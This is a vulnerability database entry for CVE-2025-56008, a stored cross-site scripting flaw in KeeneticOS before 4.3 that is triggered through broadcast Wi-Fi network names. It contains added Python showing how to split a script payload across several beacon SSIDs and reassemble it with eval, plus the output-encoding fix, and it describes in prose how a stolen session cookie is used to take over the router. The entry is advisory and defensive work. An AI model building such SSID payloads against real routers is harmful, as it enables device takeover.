CVE-2025-56008
Description
Cross-site scripting (XSS) vulnerability in KeeneticOS before 4.3 on the "Wireless ISP" page allows attackers located near the router to take over the device by adding additional users with full permissions.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
XSS in KeeneticOS before 4.3 at the Wireless ISP page lets nearby attackers gain admin access via crafted SSID payloads.
Vulnerability
Overview
A stored cross-site scripting (XSS) vulnerability exists in KeeneticOS versions before 4.3 on the "Wireless ISP" page. The vulnerability arises because the router does not properly sanitize access point SSID names displayed on this page, allowing an attacker to inject arbitrary HTML and JavaScript into the administrative interface [1][2].
Attack
Vector and Exploitation
An attacker within Wi-Fi range can broadcast a specially crafted SSID using a tool such as scapy. An 802.11 SSID is limited to 32 octets, so a useful payload does not fit in a single network name; the attacker works around this by broadcasting several beacon frames whose SSIDs each store a fragment of the payload in a JavaScript variable, followed by a final frame whose SSID reassembles the fragments and executes the result. When an administrator views the Wireless ISP page, which lists the SSIDs the router has seen, the injected script runs in the context of the administrator's session [2].
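As an added example (not Keenetic's code and not the exploit from the cited write-up), the following Python packs a script payload into beacon SSIDs that each respect the 32-octet limit, simulates a browser reassembling and "executing" the fragments in beacon order, and contrasts the unescaped rendering that causes this bug class with the HTML-encoded form. The `p+=` / `eval(p)` fragment scheme, the `<tr>` row markup and the benign `alert(document.domain)` payload are assumptions made for illustration; scapy is not used, so the code runs offline.

```python
"""Added example (not Keenetic's or the write-up's code).

Shows two things the text describes: how a script payload longer than one
SSID can be spread over several beacon frames that each append a fragment
to a JavaScript variable, with a final frame that executes the result; and
the output-encoding fix that stops an SSID from being parsed as markup.
The fragment encoding (p+=..., eval(p)) is an illustrative assumption, not
the scheme used in the write-up.
"""
import html
import json
import re

SSID_MAX_OCTETS = 32  # 802.11 limits the SSID element to 32 octets (bytes, not characters)

FRAG_PREFIX = '<script>p+='             # each fragment appends a JSON string literal to p
FRAG_SUFFIX = '</script>'
INIT_SSID = '<script>p=""</script>'      # first beacon: create the accumulator
FINAL_SSID = '<script>eval(p)</script>'  # last beacon: run the assembled payload


def ssid_octets(ssid: str) -> int:
    """Length the SSID would occupy in the beacon's SSID element."""
    return len(ssid.encode('utf-8'))


def fragment_payload(payload: str) -> list[str]:
    """Greedily pack payload into SSIDs that each fit the 32-octet limit."""
    ssids = [INIT_SSID]
    chunk = ''
    for ch in payload:
        candidate = chunk + ch
        wrapped = FRAG_PREFIX + json.dumps(candidate) + FRAG_SUFFIX
        if ssid_octets(wrapped) <= SSID_MAX_OCTETS:
            chunk = candidate
            continue
        if not chunk:  # defensive: a single JSON-escaped character always fits
            raise ValueError(f'{ch!r} cannot be encoded within one SSID')
        ssids.append(FRAG_PREFIX + json.dumps(chunk) + FRAG_SUFFIX)
        chunk = ch
    if chunk:
        ssids.append(FRAG_PREFIX + json.dumps(chunk) + FRAG_SUFFIX)
    ssids.append(FINAL_SSID)
    assert all(ssid_octets(s) <= SSID_MAX_OCTETS for s in ssids)
    return ssids


_FRAG_RE = re.compile(r'^<script>p\+=(".*")</script>$')


def reassemble(ssids: list[str]) -> str:
    """Simulate the browser executing the injected scripts in beacon order."""
    p = None
    for ssid in ssids:
        if ssid == INIT_SSID:
            p = ''
        elif ssid == FINAL_SSID:
            if p is None:
                raise ValueError('eval before the accumulator was created')
            return p
        else:
            m = _FRAG_RE.match(ssid)
            if m is None or p is None:
                raise ValueError(f'unexpected SSID {ssid!r}')
            p += json.loads(m.group(1))
    raise ValueError('no final frame seen')


def render_ssid_row_vulnerable(ssid: str) -> str:
    """Interpolates the scanned SSID into the page unescaped: the bug class described above."""
    return f'<tr><td class="ssid">{ssid}</td></tr>'


def render_ssid_row_fixed(ssid: str) -> str:
    """Encodes & < > " ' so the SSID is shown as text and never parsed as markup."""
    return f'<tr><td class="ssid">{html.escape(ssid, quote=True)}</td></tr>'


if __name__ == '__main__':
    frames = fragment_payload('alert(document.domain)')  # constructed benign payload
    for i, s in enumerate(frames):
        print(f'beacon {i}: {ssid_octets(s):2d} octets  {s}')
    print('reassembled:', reassemble(frames))
    print('vulnerable :', render_ssid_row_vulnerable(frames[0]))
    print('fixed      :', render_ssid_row_fixed(frames[0]))
```

The octet check matters because `json.dumps` escapes quotes and non-ASCII characters, so a fragment's byte length is not its character count; the greedy packer measures the fully wrapped SSID each time rather than assuming a fixed payload budget per frame. On the defensive side, encoding at output time (`html.escape`) is the fix that survives whatever the attacker puts on the air; rejecting "suspicious" SSIDs at scan time would not, since any byte sequence is a legal SSID.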
Impact
The attacker can exfiltrate the session cookie via postMessage to an attacker-controlled endpoint and then use that authentication token to add new administrative users with full permissions, effectively taking over the router [1][2].
Mitigation
Keenetic has addressed this vulnerability in KeeneticOS 4.3. Users should update to that release or later; no workaround is provided for older versions [1].
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- KeeneticOS / KeeneticOS
- Range: <4.3
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- keenetic.com/global/security (NVD: Vendor Advisory)
- keenetic.com (NVD: Product)
- github.com/notdenied/writeups/blob/main/CVE/CVE-2025-56008.md (NVD)
News mentions
No linked articles in our index yet.